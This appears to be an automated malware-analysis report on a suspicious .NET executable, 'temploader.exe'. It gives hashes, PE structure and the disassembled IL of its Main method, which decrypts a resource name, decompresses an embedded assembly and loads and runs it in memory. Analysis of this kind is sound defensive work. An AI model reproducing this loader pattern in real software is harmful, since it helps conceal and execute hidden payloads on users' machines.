Suspicious
Suspect

56770ffe1007c3b0b8317324a1f1f6ec

PE Executable | MD5: 56770ffe1007c3b0b8317324a1f1f6ec | Size: 1.85 MB | application/x-dosexec


Characteristics
Hash | Hash Value
MD5 | 56770ffe1007c3b0b8317324a1f1f6ec
Sha1 | 432fab237acf1e1c2de86bbdefd774288c20f343
Sha256 | 234c27282540fce4e90e597643213f70e86a028f155ac6796abcd5d88b3e53d0
Sha384 | b58f6e10d261e8a3466fbd47ad79639022c7a36796c103022ece612c6aa3999e3ca522db9999ee3ada42580ddd76e19a
Sha512 | 50fb4446328c316b35ec9e33bdd871dee64024880a379a522a0fd17ec39a873b8b41c6a69adac06425d74c43e18919aaa3e989289c7dd387bf85559529610564
SSDeep | 49152:I2xpE+lufuINhI1aUldbJ8R1Xf+8aduStOnl:I2xrQpNa/lP8R1Za30
TLSH | 7B8533BBE9B592C7DF40DB7FE4B71E1B2E4463438214D228B82E66CDD5024629F9D138

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information
Name | Value
Module Name | temploader.exe
Full Name | temploader.exe
EntryPoint | System.Void a.a::Main()
Scope Name | temploader.exe
Scope Type | ModuleDef
Kind | Windows
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | temploader
Assembly Version | 0.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | <null>
Total Strings | 3
Main Method | System.Void a.a::Main()
Main IL Instruction Count | 37

Main IL

    call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
    ldstr DwHCpvZOSDRbGcRvwQ/qpg==
    ldstr GbOC8/0FNDMvpceVK/yWnV49A2l2pGzr1rWKOLmSKPI=
    ldstr 9EHs+DE55KblKKhZxtd88Q==
    call System.String ⨲ꓣ緊굛উᒌ닏ɗ며::펿䏂ቌ摤왯ퟩ㕦ಓﵡ(System.String,System.String,System.String)
    callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String)
    stloc.0
    newobj System.Void System.IO.MemoryStream::.ctor()
    stloc.1
    ldloc.0
    ldc.i4.0
    newobj System.Void System.IO.Compression.DeflateStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode)
    stloc.2
    ldloc.2
    ldloc.1
    callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream)
    leave IL_0046: ldloc.1
    ldloc.2
    brfalse IL_0045: endfinally
    ldloc.2
    callvirt System.Void System.IDisposable::Dispose()
    endfinally
    ldloc.1
    callvirt System.Byte[] System.IO.MemoryStream::ToArray()
    call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint()
    ldnull
    ldnull
    callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[])
    pop
    leave IL_0070: ret
    ldloc.0
    brfalse IL_006F: endfinally
    ldloc.0
    callvirt System.Void System.IDisposable::Dispose()
    endfinally
    ret

Artefacts
Name | Value
Embedded Resources | 1
Suspicious Type Names (1-2 chars) | 1
